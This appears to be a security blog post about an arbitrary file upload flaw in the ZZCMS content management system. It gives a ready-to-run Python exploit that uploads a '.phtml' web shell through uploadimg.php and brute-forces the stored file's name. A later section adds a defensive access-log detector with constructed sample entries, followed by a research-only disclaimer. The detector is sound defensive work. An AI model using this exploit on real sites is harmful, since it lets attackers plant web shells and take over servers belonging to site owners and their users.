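The 站长招商网 content management system, ZZCMS for short, is developed by the ZZCMS team. It incorporates database optimization, content caching, AJAX and other technologies so that the site's security, stability and load capacity are reliably assured. The source code is open and the functional modules are independent, which makes secondary development easy.
Filtering at one point in zzcms is not strict, which allows arbitrary script files to be uploaded.
Here is the exp directly: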
```python
# -*- coding:utf-8 -*-
import requests
import threading
import time
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("-u")
args = parser.parse_args()
urls = args.u
urlib = urls+'uploadimg.php'

def B(url):
    try:
        if requests.get(url,timeout=3).status_code == 200:
            lock.acquire()
            print u"[+++] shell地址:", url
            lock.release()
    except:
        pass

def L(url,filename):
    print u'[+++] ADMINSS:正在尝试上传shell'
    try:
        urls = '%s'%url
        files = {'g_fu_image[]': ('%s'%filename, open('%s'%filename, 'rb'), 'image/jpg', {'Expires': '0'})}
        r = requests.post(urls, files=files)
        fname = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
        froot = '/uploadfiles/'+time.strftime('%Y-%m',time.localtime(time.time()))+'/'
        upfrt = urls+froot+fname
        shll = upfrt.replace('uploadimg.php/', '')
        return shll
    except:
        bugs = u'[+++]ERROR:文件上传失败'
        print bugs

print '[+++] ADMINSS:'+urls
shel = L(urlib,'1.phtml')
shell = shel
print u'[+++] ADMINSS:上传成功 正在爆破shell地址'
lock = threading.Lock()
pool = []
for x in xrange(100, 999):
    pool.append(threading.Thread(target=B, args=(shell+str(x)+'.phtml',)))
    if len(pool) > 20 or x == 998:
        for x in pool:
            x.start()
        for x in pool:
            x.join()
        pool = []
```
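The traffic this script produces is easy to recognise in access logs: a POST to `uploadimg.php` followed by a sweep of requests for `/uploadfiles/YYYY-MM/<14-digit timestamp><3-digit suffix>` with a script extension. The detector below is an added example, not part of the original post; the combined log format, the extension list, the threshold, the function names and the sample log lines are all assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Combined-log-style line: client, request line, status (log format is an assumption).
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Stored name seen in the PoC: 14-digit timestamp + 3-digit suffix, under /uploadfiles/YYYY-MM/.
STORED = re.compile(r'/uploadfiles/\d{4}-\d{2}/\d{17}\.([A-Za-z0-9]+)$')
# Extensions commonly mapped to the PHP handler; adjust to the server's configuration.
SCRIPT_EXT = {"php", "php3", "php5", "phtml", "phar", "pht"}
PROBE_THRESHOLD = 5  # assumed tuning value

def detect(lines):
    """Return {client: {"uploads": n, "probes": n, "hits": [paths]}} for suspicious clients."""
    stats = defaultdict(lambda: {"uploads": 0, "probes": 0, "hits": []})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        path = target.split("?", 1)[0]
        if method == "POST" and path.endswith("/uploadimg.php"):
            stats[client]["uploads"] += 1
            continue
        s = STORED.search(path)
        if s and s.group(1).lower() in SCRIPT_EXT:
            stats[client]["probes"] += 1
            if status == "200":  # a script file is actually being served from the upload dir
                stats[client]["hits"].append(path)
    return {c: v for c, v in stats.items()
            if v["hits"] or (v["uploads"] and v["probes"] >= PROBE_THRESHOLD)}

def sample_log():
    """Constructed sample: one client uploads then sweeps suffixes; another views an image."""
    fmt = '{ip} - - [01/Jan/2024:10:00:{s:02d} +0000] "{m} {p} HTTP/1.1" {c} 0'
    rows = [fmt.format(ip="203.0.113.7", s=0, m="POST", p="/uploadimg.php", c=200)]
    for i, n in enumerate(range(100, 110)):
        code = 200 if n == 107 else 404
        rows.append(fmt.format(ip="203.0.113.7", s=i + 1, m="GET",
                               p="/uploadfiles/2024-01/20240101100000%d.phtml" % n, c=code))
    rows.append(fmt.format(ip="198.51.100.9", s=30, m="GET",
                           p="/uploadfiles/2024-01/20240101093000123.jpg", c=200))
    return rows

if __name__ == "__main__":
    for client, info in detect(sample_log()).items():
        print(client, info)
```

Any entry in `hits` means a script file is being served from the upload directory, which should be treated as a compromise regardless of the probe count.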
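Disclaimer: the programs (methods) covered in this article may be offensive in nature and are intended for security research and teaching only. Readers who put this information to other uses bear full legal and joint liability; this site bears no legal or joint liability. If there is a problem, contact us by e-mail (a corporate or otherwise valid mailbox is recommended so that the message is not blocked; contact details are on the home page).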